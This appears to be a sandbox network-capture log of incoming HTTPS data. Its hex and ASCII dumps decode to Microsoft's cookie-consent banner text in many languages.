2023-05-31 15:08:31 UTC	205	IN	Data Raw: a4 86 e0 a4 b5 e0 a4 b6 e0 a5 8d e0 a4 af e0 a4 95 20 e0 a4 95 e0 a5 81 e0 a4 95 e0 a5 80 e0 a4 9c e0 a4 bc 20 e0 a4 95 e0 a4 be 20 e0 a4 b9 e0 a5 80 20 e0 a4 89 e0 a4 aa e0 a4 af e0 a5 8b e0 a4 97 20 e0 a4 95 e0 a4 bf e0 a4 af e0 a4 be 20 e0 a4 9c e0 a4 be e0 a4 8f e0 a4 97 e0 a4 be 2e 20 e0 a4 86 e0 a4 aa 20 e0 a4 aa e0 a5 83 e0 a4 b7 e0 a5 8d e0 a4 a0 20 e0 a4 95 e0 a5 87 20 e0 a4 a8 e0 a4 bf e0 a4 9a e0 a4 b2 e0 a5 87 20 e0 a4 ad e0 a4 be e0 a4 97 20 e0 a4 ae e0 a5 87 e0 a4 82 20 27 e0 a4 95 e0 a5 81 e0 a4 95 e0 a5 80 e0 a4 9c e0 a4 bc 20 e0 a4 aa e0 a5 8d e0 a4 b0 e0 a4 ac e0 a4 82 e0 a4 a7 e0 a4 bf e0 a4 a4 20 e0 a4 95 e0 a4 b0 e0 a5 87 e0 a4 82 27 20 e0 a4 aa e0 a4 b0 20 e0 a4 95 e0 a5 8d e0 a4 b2 e0 a4 bf e0 a4 95 20 e0 a4 95 e0 a4 b0 e0 a4 95 e0 Data Ascii: . ' '
2023-05-31 15:08:31 UTC	213	IN	Data Raw: b5 d1 80 d1 81 d0 be d0 bd d0 b0 d0 bb d0 b8 d0 b7 d0 b8 d1 80 d0 b0 d0 bd d0 b0 20 d1 80 d0 b5 d0 ba d0 bb d0 b0 d0 bc d0 b0 20 d0 b2 d1 8a d0 b7 20 d0 be d1 81 d0 bd d0 be d0 b2 d0 b0 20 d0 bd d0 b0 20 d0 b2 d0 b0 d1 88 d0 b0 d1 82 d0 b0 20 d0 be d0 bd d0 bb d0 b0 d0 b9 d0 bd 20 d0 b0 d0 ba d1 82 d0 b8 d0 b2 d0 bd d0 be d1 81 d1 82 2e 20 d0 90 d0 ba d0 be 20 d0 be d1 82 d1 85 d0 b2 d1 8a d1 80 d0 bb d0 b8 d1 82 d0 b5 20 d0 be d0 bf d1 86 d0 b8 d0 be d0 bd d0 b0 d0 bb d0 bd d0 b8 d1 82 d0 b5 20 d0 b1 d0 b8 d1 81 d0 ba d0 b2 d0 b8 d1 82 d0 ba d0 b8 2c 20 d1 89 d0 b5 20 d1 81 d0 b5 20 d0 b8 d0 b7 d0 bf d0 be d0 bb d0 b7 d0 b2 d0 b0 d1 82 20 d1 81 d0 b0 d0 bc d0 be 20 d0 b1 d0 b8 d1 81 d0 ba d0 b2 d0 b8 d1 82 d0 ba d0 b8 2c 20 d0 ba d0 be d0 b8 d1 82 d0 be Data Ascii: . , ,
2023-05-31 15:08:31 UTC	221	IN	Data Raw: 20 6e 61 c5 a1 69 68 20 77 65 62 20 6c 6f 6b 61 63 69 6a 61 2e 22 7d 2c 7b 69 64 3a 22 63 31 22 2c 6e 61 6d 65 3a 22 41 6e 61 6c 69 74 69 6b 61 22 2c 64 65 73 63 3a 22 44 6f 70 75 c5 a1 74 61 6d 6f 20 74 72 65 c4 87 69 6d 20 73 74 72 61 6e 61 6d 61 20 64 61 20 6b 6f 72 69 73 74 65 20 61 6e 61 6c 69 74 69 c4 8d 6b 65 20 6b 6f 6c 61 c4 8d 69 c4 87 65 20 64 61 20 62 69 20 72 61 7a 75 6d 6a 65 6c 69 20 6b 61 6b 6f 20 6b 6f 72 69 73 74 69 74 65 20 6e 61 c5 a1 65 20 77 65 62 20 6c 6f 6b 61 63 69 6a 65 20 74 61 6b 6f 20 64 61 20 69 68 20 6d 6f c5 be 65 6d 6f 20 70 6f 62 6f 6c 6a c5 a1 61 74 69 2c 20 61 20 74 72 65 c4 87 65 20 73 74 72 61 6e 65 20 6d 6f 67 75 20 72 61 7a 76 69 74 69 20 69 20 70 6f 62 6f 6c 6a c5 a1 61 74 69 20 73 76 6f 6a 65 20 70 72 6f 69 7a 76 Data Ascii: naih web lokacija."},{id:"c1",name:"Analitika",desc:"Doputamo treim stranama da koriste analitike kolaie da bi razumjeli kako koristite nae web lokacije tako da ih moemo poboljati, a tree strane mogu razviti i poboljati svoje proizv
2023-05-31 15:08:31 UTC	229	IN	Data Raw: 6f 6f 6b 69 65 20 70 72 6f 20 73 6f 63 69 c3 a1 6c 6e c3 ad 20 73 c3 ad 74 c4 9b 20 70 6f 75 c5 be c3 ad 76 c3 a1 6d 65 20 73 70 6f 6c 75 20 73 20 74 c5 99 65 74 c3 ad 6d 69 20 73 74 72 61 6e 61 6d 69 20 6b 20 7a 6f 62 72 61 7a 6f 76 c3 a1 6e c3 ad 20 72 65 6b 6c 61 6d 20 61 20 6f 62 73 61 68 75 20 6e 61 20 7a c3 a1 6b 6c 61 64 c4 9b 20 76 61 c5 a1 69 63 68 20 70 72 6f 66 69 6c c5 af 20 6e 61 20 73 6f 63 69 c3 a1 6c 6e c3 ad 63 68 20 73 c3 ad 74 c3 ad 63 68 20 61 20 61 6b 74 69 76 69 74 20 6e 61 20 6e 61 c5 a1 69 63 68 20 77 65 62 65 63 68 2e 20 53 6c 6f 75 c5 be c3 ad 20 6b 20 70 72 6f 70 6f 6a 65 6e c3 ad 20 76 61 c5 a1 c3 ad 20 61 6b 74 69 76 69 74 79 20 6e 61 20 6e 61 c5 a1 69 63 68 20 77 65 62 65 63 68 20 73 20 70 72 6f 66 69 6c 79 20 6e 61 20 73 6f Data Ascii: ookie pro sociln st pouvme spolu s tetmi stranami k zobrazovn reklam a obsahu na zklad vaich profil na socilnch stch a aktivit na naich webech. Slou k propojen va aktivity na naich webech s profily na so
2023-05-31 15:08:31 UTC	237	IN	Data Raw: 2e 20 3c 61 20 74 61 72 67 65 74 3d 27 5f 62 6c 61 6e 6b 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 3f 4c 69 6e 6b 49 64 3d 35 32 31 38 33 39 27 3e 44 61 74 65 6e 73 63 68 75 74 7a 65 72 6b 6c c3 a4 72 75 6e 67 3c 2f 61 3e 20 3c 61 20 74 61 72 67 65 74 3d 27 5f 62 6c 61 6e 6b 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 61 6b 61 2e 6d 73 2f 33 72 64 70 61 72 74 79 63 6f 6f 6b 69 65 73 27 3e 43 6f 6f 6b 69 65 73 20 76 6f 6e 20 44 72 69 74 74 61 6e 62 69 65 74 65 72 6e 3c 2f 61 3e 22 2c 61 63 63 65 70 74 41 6c 6c 4c 61 62 65 6c 3a 22 41 6e 6e 65 68 6d 65 6e 22 2c 72 65 6a 65 63 74 41 6c 6c 4c 61 62 65 6c 3a 22 41 62 6c 65 68 6e 65 6e 22 2c 6d 6f 72 65 49 6e 66 6f 4c 61 62 65 6c Data Ascii: . <a target='_blank' href='https://go.microsoft.com/fwlink/?LinkId=521839'>Datenschutzerklrung</a> <a target='_blank' href='https://aka.ms/3rdpartycookies'>Cookies von Drittanbietern</a>",acceptAllLabel:"Annehmen",rejectAllLabel:"Ablehnen",moreInfoLabel
2023-05-31 15:08:31 UTC	245	IN	Data Raw: cf 81 ce b7 cf 83 ce b9 ce bc ce bf cf 80 ce bf ce b9 ce bf cf 8d ce bc ce b5 20 ce bf cf 81 ce b9 cf 83 ce bc ce ad ce bd ce b1 20 63 6f 6f 6b 69 65 20 ce b1 ce bd ce ac ce bb cf 85 cf 83 ce b7 cf 82 20 ce b3 ce b9 ce b1 20 ce b4 ce b9 ce b1 cf 86 ce b7 ce bc ce af cf 83 ce b5 ce b9 cf 82 2e 22 7d 2c 7b 69 64 3a 22 63 32 22 2c 6e 61 6d 65 3a 22 43 6f 6f 6b 69 65 20 ce bc ce ad cf 83 cf 89 ce bd 20 ce ba ce bf ce b9 ce bd cf 89 ce bd ce b9 ce ba ce ae cf 82 20 ce b4 ce b9 ce ba cf 84 cf 8d cf 89 cf 83 ce b7 cf 82 22 2c 64 65 73 63 3a 22 ce 95 ce bc ce b5 ce af cf 82 2c 20 ce ba ce b1 ce b8 cf 8e cf 82 20 ce ba ce b1 ce b9 20 cf 84 cf 81 ce af cf 84 ce b1 20 ce bc ce ad cf 81 ce b7 2c 20 cf 87 cf 81 ce b7 cf 83 ce b9 ce bc ce bf cf 80 ce bf ce b9 ce bf cf Data Ascii: cookie ."},{id:"c2",name:"Cookie ",desc:", ,
2023-05-31 15:08:31 UTC	253	IN	Data Raw: 22 7d 2c 7b 69 64 3a 22 63 31 22 2c 6e 61 6d 65 3a 22 41 6e c3 a1 6c 69 73 69 73 22 2c 64 65 73 63 3a 22 50 65 72 6d 69 74 69 6d 6f 73 20 61 20 74 65 72 63 65 72 6f 73 20 75 74 69 6c 69 7a 61 72 20 63 6f 6f 6b 69 65 73 20 64 65 20 61 6e c3 a1 6c 69 73 69 73 20 70 61 72 61 20 63 6f 6d 70 72 65 6e 64 65 72 20 63 c3 b3 6d 6f 20 75 74 69 6c 69 7a 61 73 20 6e 75 65 73 74 72 6f 73 20 73 69 74 69 6f 73 20 77 65 62 20 64 65 20 66 6f 72 6d 61 20 71 75 65 20 70 6f 64 61 6d 6f 73 20 6d 65 6a 6f 72 61 72 6c 6f 73 20 79 20 71 75 65 20 64 69 63 68 6f 73 20 74 65 72 63 65 72 6f 73 20 70 75 65 64 61 6e 20 64 65 73 61 72 72 6f 6c 6c 61 72 20 79 20 6d 65 6a 6f 72 61 72 20 73 75 73 20 70 72 6f 64 75 63 74 6f 73 2c 20 6c 61 73 20 63 75 61 6c 65 73 20 70 75 65 64 65 6e 20 75 Data Ascii: "},{id:"c1",name:"Anlisis",desc:"Permitimos a terceros utilizar cookies de anlisis para comprender cmo utilizas nuestros sitios web de forma que podamos mejorarlos y que dichos terceros puedan desarrollar y mejorar sus productos, las cuales pueden u
2023-05-31 15:08:31 UTC	261	IN	Data Raw: 61 20 6d 65 64 69 61 73 73 61 20 6e c3 a4 6b 65 6d c3 a4 73 69 20 6d 61 69 6e 6f 6b 73 65 74 20 6a 61 20 73 69 73 c3 a4 6c 74 c3 b6 20 76 61 73 74 61 61 76 61 74 20 70 61 72 65 6d 6d 69 6e 20 6b 69 69 6e 6e 6f 73 74 75 6b 73 65 6e 20 6b 6f 68 74 65 69 74 61 73 69 2e 22 7d 2c 7b 69 64 3a 22 63 33 22 2c 6e 61 6d 65 3a 22 4d 61 69 6e 6f 6e 74 61 22 2c 64 65 73 63 3a 22 4d 61 69 6e 6f 6e 74 61 65 76 c3 a4 73 74 65 69 64 65 6e 20 61 76 75 6c 6c 61 20 4d 69 63 72 6f 73 6f 66 74 20 6a 61 20 6b 6f 6c 6d 61 6e 6e 65 74 20 6f 73 61 70 75 6f 6c 65 74 20 76 6f 69 76 61 74 20 6e c3 a4 79 74 74 c3 a4 c3 a4 20 73 69 6e 75 6c 6c 65 20 75 75 73 69 61 20 6d 61 69 6e 6f 6b 73 69 61 20 74 61 6c 6c 65 6e 74 61 6d 61 6c 6c 61 20 74 69 65 74 6f 6a 61 20 73 69 69 74 c3 a4 2c 20 Data Ascii: a mediassa nkemsi mainokset ja sislt vastaavat paremmin kiinnostuksen kohteitasi."},{id:"c3",name:"Mainonta",desc:"Mainontaevsteiden avulla Microsoft ja kolmannet osapuolet voivat nytt sinulle uusia mainoksia tallentamalla tietoja siit,
2023-05-31 15:08:31 UTC	322	IN	Data Raw: 6c 20 61 20 63 68 75 6d 61 69 6c 20 61 69 72 20 64 c3 a8 20 61 6e 20 74 2d 73 61 6e 61 73 61 63 68 64 20 61 69 72 20 61 6d 20 62 72 69 6f 67 20 74 68 75 20 6e 6f 20 72 75 64 61 6e 20 61 20 63 68 65 61 6e 6e 61 69 63 68 65 61 73 20 74 75 20 61 6e 20 64 c3 a8 69 64 68 20 64 68 75 74 20 62 72 69 6f 67 61 64 68 20 61 69 72 20 73 61 6e 61 73 61 63 68 64 20 61 69 72 73 6f 6e 20 70 c3 a0 69 67 68 65 61 64 68 20 61 67 75 73 20 61 69 72 73 6f 6e 20 73 61 6e 61 73 61 63 68 64 20 61 20 73 68 65 61 6c 6c 74 61 69 6e 6e 20 61 20 62 68 69 6f 73 20 6e 61 73 20 69 6f 6d 63 68 61 69 64 68 65 20 64 68 75 74 2d 73 61 2e 20 4d 61 72 20 65 69 73 69 6d 70 6c 65 69 72 2c 20 61 69 72 73 6f 6e 20 e2 80 99 73 20 67 75 6d 20 62 69 20 66 69 6f 73 20 61 67 61 69 6e 6e 20 6e 75 61 69 Data Ascii: l a chumail air d an t-sanasachd air am briog thu no rudan a cheannaicheas tu an didh dhut briogadh air sanasachd airson pigheadh agus airson sanasachd a shealltainn a bhios nas iomchaidhe dhut-sa. Mar eisimpleir, airson s gum bi fios againn nuai
2023-05-31 15:08:31 UTC	330	IN	Data Raw: d7 93 d7 a2 d7 95 d7 aa 20 d7 95 d7 aa d7 9b d7 a0 d7 99 d7 9d 20 d7 94 d7 9e d7 91 d7 95 d7 a1 d7 a1 d7 99 d7 9d 20 d7 a2 d7 9c 20 d7 a4 d7 a8 d7 95 d7 a4 d7 99 d7 9c d7 99 20 d7 94 d7 9e d7 93 d7 99 d7 94 20 d7 94 d7 97 d7 91 d7 a8 d7 aa d7 99 d7 99 d7 9d 20 d7 95 d7 94 d7 a4 d7 a2 d7 99 d7 9c d7 95 d7 aa 20 d7 a9 d7 9c d7 a0 d7 95 20 d7 91 d7 90 d7 aa d7 a8 d7 99 20 d7 94 d7 90 d7 99 d7 a0 d7 98 d7 a8 d7 a0 d7 98 20 d7 a9 d7 9c d7 a0 d7 95 2e 20 d7 94 d7 9d 20 d7 9e d7 a9 d7 9e d7 a9 d7 99 d7 9d 20 d7 9c d7 97 d7 99 d7 91 d7 95 d7 a8 20 d7 94 d7 a4 d7 a2 d7 99 d7 9c d7 95 d7 aa 20 d7 a9 d7 9c d7 9a 20 d7 91 d7 90 d7 aa d7 a8 d7 99 20 d7 94 d7 90 d7 99 d7 a0 d7 98 d7 a8 d7 a0 d7 98 20 d7 a9 d7 9c d7 a0 d7 95 20 d7 9c d7 a4 d7 a8 d7 95 d7 a4 d7 99 d7 9c Data Ascii: .
2023-05-31 15:08:31 UTC	338	IN	Data Raw: a9 67 69 20 6d c3 a9 64 69 c3 a1 73 20 6f 6c 64 61 6c 61 6b 6f 6e 20 61 20 66 65 6c 68 61 73 7a 6e c3 a1 6c c3 b3 6b 20 c3 a9 72 64 65 6b 6c c5 91 64 c3 a9 73 c3 a9 72 65 20 66 65 6c 74 65 68 65 74 c5 91 65 6e 20 73 7a c3 a1 6d 6f 74 20 74 61 72 74 c3 b3 20 68 69 72 64 65 74 c3 a9 73 65 6b 20 c3 a9 73 20 74 61 72 74 61 6c 6d 61 6b 20 6a 65 6c 65 6e 6a 65 6e 65 6b 20 6d 65 67 2e 22 7d 2c 7b 69 64 3a 22 63 33 22 2c 6e 61 6d 65 3a 22 52 65 6b 6c c3 a1 6d 63 c3 a9 6c c3 ba 22 2c 64 65 73 63 3a 22 4d 69 6e 64 20 74 c3 a1 72 73 61 73 c3 a1 67 75 6e 6b 2c 20 6d 69 6e 64 20 6e c3 a9 68 c3 a1 6e 79 20 70 61 72 74 6e 65 72 c3 bc 6e 6b 20 61 20 6b 6f 72 c3 a1 62 62 61 6e 20 6d c3 a1 72 20 6d 65 67 6a 65 6c 65 6e c3 ad 74 65 74 74 20 68 69 72 64 65 74 c3 a9 73 65 6b Data Ascii: gi mdis oldalakon a felhasznlk rdekldsre felteheten szmot tart hirdetsek s tartalmak jelenjenek meg."},{id:"c3",name:"Reklmcl",desc:"Mind trsasgunk, mind nhny partnernk a korbban mr megjelentett hirdetsek
2023-05-31 15:08:31 UTC	346	IN	Data Raw: 27 3e 49 6e 66 6f 72 6d 61 74 69 76 61 20 73 75 6c 6c 61 20 70 72 69 76 61 63 79 3c 2f 61 3e 20 3c 61 20 74 61 72 67 65 74 3d 27 5f 62 6c 61 6e 6b 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 61 6b 61 2e 6d 73 2f 33 72 64 70 61 72 74 79 63 6f 6f 6b 69 65 73 27 3e 43 6f 6f 6b 69 65 20 64 69 20 74 65 72 7a 61 20 70 61 72 74 69 3c 2f 61 3e 22 2c 61 63 63 65 70 74 41 6c 6c 4c 61 62 65 6c 3a 22 41 63 63 65 74 74 61 22 2c 72 65 6a 65 63 74 41 6c 6c 4c 61 62 65 6c 3a 22 52 69 66 69 75 74 61 22 2c 6d 6f 72 65 49 6e 66 6f 4c 61 62 65 6c 3a 22 47 65 73 74 69 73 63 69 20 69 20 63 6f 6f 6b 69 65 22 2c 70 72 65 66 65 72 65 6e 63 65 73 44 69 61 6c 6f 67 43 6c 6f 73 65 4c 61 62 65 6c 3a 22 43 68 69 75 64 69 22 2c 70 72 65 66 65 72 65 6e 63 65 73 44 69 61 6c 6f 67 54 Data Ascii: '>Informativa sulla privacy</a> <a target='_blank' href='https://aka.ms/3rdpartycookies'>Cookie di terza parti</a>",acceptAllLabel:"Accetta",rejectAllLabel:"Rifiuta",moreInfoLabel:"Gestisci i cookie",preferencesDialogCloseLabel:"Chiudi",preferencesDialogT
2023-05-31 15:08:31 UTC	354	IN	Data Raw: 82 d1 96 d2 a3 d1 96 d0 b7 d0 b3 d0 b5 20 d0 bd d0 b5 d0 b3 d1 96 d0 b7 d0 b4 d0 b5 d0 bb d0 b3 d0 b5 d0 bd 20 d0 b6 d0 b5 d0 ba d0 b5 d0 bb d0 b5 d0 bd d0 b4 d1 96 d1 80 d1 96 d0 bb d0 b3 d0 b5 d0 bd 20 d0 b6 d0 b0 d1 80 d0 bd d0 b0 d0 bc d0 b0 d0 bb d0 b0 d1 80 d0 b4 d1 8b 20 d0 ba d3 a9 d1 80 d1 81 d0 b5 d1 82 d1 83 20 d2 af d1 88 d1 96 d0 bd 20 d2 9b d0 be d1 81 d1 8b d0 bc d1 88 d0 b0 20 d0 ba d1 83 d0 ba d0 b8 20 d1 84 d0 b0 d0 b9 d0 bb d0 b4 d0 b0 d1 80 d1 8b d0 bd 20 d0 bf d0 b0 d0 b9 d0 b4 d0 b0 d0 bb d0 b0 d0 bd d0 b0 d0 bc d1 8b d0 b7 2e 20 d0 a2 d0 b0 d2 a3 d0 b4 d0 b0 d1 83 d0 bb d1 8b 20 d0 ba d1 83 d0 ba d0 b8 20 d1 84 d0 b0 d0 b9 d0 bb d0 b4 d0 b0 d1 80 d1 8b d0 bd 20 d2 9b d0 b0 d0 b1 d1 8b d0 bb d0 b4 d0 b0 d0 bc d0 b0 d1 81 d0 b0 d2 a3 Data Ascii: .
2023-05-31 15:08:31 UTC	362	IN	Data Raw: a0 ed 82 a4 eb 8a 94 20 eb 8b b9 ec 82 ac 20 ec 9b b9 20 ec 82 ac ec 9d b4 ed 8a b8 ea b0 80 20 ec 9e 91 eb 8f 99 ed 95 98 ea b8 b0 20 ec 9c 84 ed 95 b4 20 ea bc ad 20 ed 95 84 ec 9a 94 ed 95 a9 eb 8b 88 eb 8b a4 2e 22 7d 2c 7b 69 64 3a 22 63 31 22 2c 6e 61 6d 65 3a 22 eb b6 84 ec 84 9d 22 2c 64 65 73 63 3a 22 eb 8b b9 ec 82 ac eb 8a 94 20 ec a0 9c 33 ec 9e 90 eb a1 9c 20 ed 95 98 ec 97 ac ea b8 88 20 eb b6 84 ec 84 9d 20 ec bf a0 ed 82 a4 eb a5 bc 20 ec 82 ac ec 9a a9 ed 95 98 eb 8f 84 eb a1 9d 20 ed 97 88 ec 9a a9 ed 95 98 ec 97 ac 20 ea b7 80 ed 95 98 ea b0 80 20 eb 8b b9 ec 82 ac 20 ec 9b b9 20 ec 82 ac ec 9d b4 ed 8a b8 eb a5 bc 20 eb 8d 94 20 ec 9e 98 20 ec 82 ac ec 9a a9 ed 95 a0 20 ec 88 98 20 ec 9e 88 eb 8f 84 eb a1 9d 20 ed 95 98 eb a9 b0 2c 20 Data Ascii: ."},{id:"c1",name:"",desc:" 3 ,
2023-05-31 15:08:31 UTC	370	IN	Data Raw: 2c 6e 61 6d 65 3a 22 52 65 6b 6c 61 6d 6f 73 20 73 6c 61 70 75 6b 61 69 22 2c 64 65 73 63 3a 22 4d 65 73 20 6b 61 72 74 75 20 73 75 20 74 72 65 c4 8d 69 6f 73 69 6f 6d 69 73 20 c5 a1 61 6c 69 6d 69 73 20 72 65 6b 6c 61 6d 6f 73 20 69 72 20 72 69 6e 6b 6f 64 61 72 6f 73 20 73 6c 61 70 75 6b 75 73 20 6e 61 75 64 6f 6a 61 6d 65 20 74 61 6d 2c 20 6b 61 64 20 72 6f 64 79 74 75 6d 65 20 6e 61 75 6a 61 73 20 72 65 6b 6c 61 6d 61 73 20 c4 af 72 61 c5 a1 79 64 61 6d 69 2c 20 6b 75 72 69 61 73 20 72 65 6b 6c 61 6d 61 73 20 6a 61 75 20 6d 61 74 c4 97 74 65 2e 20 4a 69 65 20 74 61 69 70 20 70 61 74 20 6e 61 75 64 6f 6a 61 6d 69 20 73 69 65 6b 69 61 6e 74 20 73 65 6b 74 69 2c 20 6b 75 72 69 61 73 20 72 65 6b 6c 61 6d 61 73 20 73 70 75 73 74 65 6c 69 74 65 20 61 72 62 Data Ascii: ,name:"Reklamos slapukai",desc:"Mes kartu su treiosiomis alimis reklamos ir rinkodaros slapukus naudojame tam, kad rodytume naujas reklamas raydami, kurias reklamas jau matte. Jie taip pat naudojami siekiant sekti, kurias reklamas spustelite arb
2023-05-31 15:08:31 UTC	378	IN	Data Raw: 74 74 61 22 2c 72 65 6a 65 63 74 41 6c 6c 4c 61 62 65 6c 3a 22 49 72 72 69 66 6a 75 74 61 22 2c 6d 6f 72 65 49 6e 66 6f 4c 61 62 65 6c 3a 22 49 6d 6d 61 6e 69 c4 a1 c4 a1 6a 61 20 6c 2d 63 6f 6f 6b 69 65 73 22 2c 70 72 65 66 65 72 65 6e 63 65 73 44 69 61 6c 6f 67 43 6c 6f 73 65 4c 61 62 65 6c 3a 22 41 67 c4 a7 6c 61 71 22 2c 70 72 65 66 65 72 65 6e 63 65 73 44 69 61 6c 6f 67 54 69 74 6c 65 3a 22 49 6d 6d 61 6e 69 c4 a1 c4 a1 6a 61 20 6c 2d 50 72 65 66 65 72 65 6e 7a 69 20 74 61 6c 2d 43 6f 6f 6b 69 65 73 22 2c 70 72 65 66 65 72 65 6e 63 65 73 44 69 61 6c 6f 67 44 65 73 63 48 74 6d 6c 3a 22 c4 a6 61 66 6e 61 20 6d 69 6c 6c 2d 77 65 62 73 6a 61 6a 74 73 20 74 61 27 20 4d 69 63 72 6f 73 6f 66 74 20 6a 75 c5 bc 61 77 20 63 6f 6f 6b 69 65 73 2e 20 43 6f 6f 6b Data Ascii: tta",rejectAllLabel:"Irrifjuta",moreInfoLabel:"Immanija l-cookies",preferencesDialogCloseLabel:"Aglaq",preferencesDialogTitle:"Immanija l-Preferenzi tal-Cookies",preferencesDialogDescHtml:"afna mill-websjajts ta' Microsoft juaw cookies. Cook
2023-05-31 15:08:31 UTC	386	IN	Data Raw: 20 67 65 62 72 75 69 6b 20 76 61 6e 20 76 65 72 65 69 73 74 65 20 63 6f 6f 6b 69 65 73 20 6f 6d 20 65 73 73 65 6e 74 69 c3 ab 6c 65 20 77 65 62 73 69 74 65 66 75 6e 63 74 69 65 73 20 74 65 20 6c 61 74 65 6e 20 77 65 72 6b 65 6e 2e 20 5a 65 20 77 6f 72 64 65 6e 20 62 69 6a 76 6f 6f 72 62 65 65 6c 64 20 67 65 62 72 75 69 6b 74 20 6f 6d 20 6a 65 20 61 61 6e 20 74 65 20 6d 65 6c 64 65 6e 2c 20 6a 65 20 74 61 61 6c 76 6f 6f 72 6b 65 75 72 65 6e 20 6f 70 20 74 65 20 73 6c 61 61 6e 2c 20 6a 65 20 77 69 6e 6b 65 6c 65 72 76 61 72 69 6e 67 20 74 65 20 76 65 72 62 65 74 65 72 65 6e 2c 20 70 72 65 73 74 61 74 69 65 73 20 74 65 20 76 65 72 68 6f 67 65 6e 2c 20 76 65 72 6b 65 65 72 20 74 75 73 73 65 6e 20 77 65 62 73 65 72 76 65 72 73 20 74 65 20 72 65 67 65 6c 65 6e Data Ascii: gebruik van vereiste cookies om essentile websitefuncties te laten werken. Ze worden bijvoorbeeld gebruikt om je aan te melden, je taalvoorkeuren op te slaan, je winkelervaring te verbeteren, prestaties te verhogen, verkeer tussen webservers te regelen
2023-05-31 15:08:31 UTC	394	IN	Data Raw: 72 61 63 6f 77 79 77 61 c4 87 20 Data Ascii: racowywa
2023-05-31 15:08:31 UTC	394	IN	Data Raw: 69 20 75 64 6f 73 6b 6f 6e 61 6c 61 c4 87 20 73 77 6f 6a 65 20 70 72 6f 64 75 6b 74 79 2c 20 61 20 6e 61 73 74 c4 99 70 6e 69 65 20 75 c5 bc 79 77 61 c4 87 20 69 63 68 20 77 20 77 69 74 72 79 6e 61 63 68 2c 20 6b 74 c3 b3 72 65 20 6e 69 65 20 6e 61 6c 65 c5 bc c4 85 20 64 6f 20 66 69 72 6d 79 20 4d 69 63 72 6f 73 6f 66 74 20 69 20 6e 69 65 20 73 c4 85 20 70 72 7a 65 7a 20 6e 69 c4 85 20 6f 62 73 c5 82 75 67 69 77 61 6e 65 2e 20 4e 61 20 70 72 7a 79 6b c5 82 61 64 20 67 72 6f 6d 61 64 7a 69 6d 79 20 77 20 74 65 6e 20 73 70 6f 73 c3 b3 62 20 64 61 6e 65 20 6f 20 6f 64 77 69 65 64 7a 61 6e 79 63 68 20 73 74 72 6f 6e 61 63 68 20 69 20 6c 69 63 7a 62 69 65 20 6b 6c 69 6b 6e 69 c4 99 c4 87 20 70 6f 74 72 7a 65 62 6e 79 63 68 20 64 6f 20 77 79 6b 6f 6e 61 6e 69 Data Ascii: i udoskonala swoje produkty, a nastpnie uywa ich w witrynach, ktre nie nale do firmy Microsoft i nie s przez ni obsugiwane. Na przykad gromadzimy w ten sposb dane o odwiedzanych stronach i liczbie klikni potrzebnych do wykonani
2023-05-31 15:08:31 UTC	402	IN	Data Raw: 72 63 65 69 72 6f 73 2c 20 63 6f 6f 6b 69 65 73 20 64 65 20 70 75 62 6c 69 63 69 64 61 64 65 20 65 20 6d 61 72 6b 65 74 69 6e 67 20 70 61 72 61 20 6c 68 65 20 6d 6f 73 74 72 61 72 20 6e 6f 76 6f 73 20 61 6e c3 ba 6e 63 69 6f 73 2c 20 72 65 67 69 73 74 61 6e 64 6f 20 6f 73 20 61 6e c3 ba 6e 63 69 6f 73 20 71 75 65 20 6a c3 a1 20 76 69 75 2e 20 54 61 6d 62 c3 a9 6d 20 73 c3 a3 6f 20 75 74 69 6c 69 7a 61 64 6f 73 20 70 61 72 61 20 6d 6f 6e 69 74 6f 72 69 7a 61 72 20 6f 73 20 61 6e c3 ba 6e 63 69 6f 73 20 65 6d 20 71 75 65 20 63 6c 69 63 61 20 6f 75 20 61 73 20 63 6f 6d 70 72 61 73 20 71 75 65 20 66 61 7a 20 64 65 70 6f 69 73 20 64 65 20 63 6c 69 63 61 72 20 6e 75 6d 20 61 6e c3 ba 6e 63 69 6f 2c 20 70 61 72 61 20 65 66 65 69 74 6f 73 20 64 65 20 70 61 67 61 Data Ascii: rceiros, cookies de publicidade e marketing para lhe mostrar novos anncios, registando os anncios que j viu. Tambm so utilizados para monitorizar os anncios em que clica ou as compras que faz depois de clicar num anncio, para efeitos de paga
2023-05-31 15:08:31 UTC	410	IN	Data Raw: 2c 64 65 73 63 3a 22 4e 6f 69 20 c8 99 69 20 74 65 72 c8 9b 69 69 20 66 6f 6c 6f 73 69 6d 20 6d 6f 64 75 6c 65 20 63 6f 6f 6b 69 65 20 64 65 20 70 75 62 6c 69 63 69 74 61 74 65 20 70 65 6e 74 72 75 20 61 20 61 66 69 c8 99 61 20 61 6e 75 6e c8 9b 75 72 69 20 6e 6f 69 2c 20 c3 ae 6e 72 65 67 69 73 74 72 c3 a2 6e 64 20 61 6e 75 6e c8 9b 75 72 69 6c 65 20 70 65 20 63 61 72 65 20 6c 65 2d 61 c8 9b 69 20 76 c4 83 7a 75 74 20 64 65 6a 61 2e 20 44 65 20 61 73 65 6d 65 6e 65 61 2c 20 73 75 6e 74 20 75 74 69 6c 69 7a 61 74 65 20 70 65 6e 74 72 75 20 61 20 75 72 6d c4 83 72 69 20 61 6e 75 6e c8 9b 75 72 69 6c 65 20 70 65 20 63 61 72 65 20 66 61 63 65 c8 9b 69 20 63 6c 69 63 20 73 61 75 20 61 63 68 69 7a 69 c8 9b 69 69 6c 65 20 70 65 20 63 61 72 65 20 6c 65 20 66 61 Data Ascii: ,desc:"Noi i terii folosim module cookie de publicitate pentru a afia anunuri noi, nregistrnd anunurile pe care le-ai vzut deja. De asemenea, sunt utilizate pentru a urmri anunurile pe care facei clic sau achiziiile pe care le fa
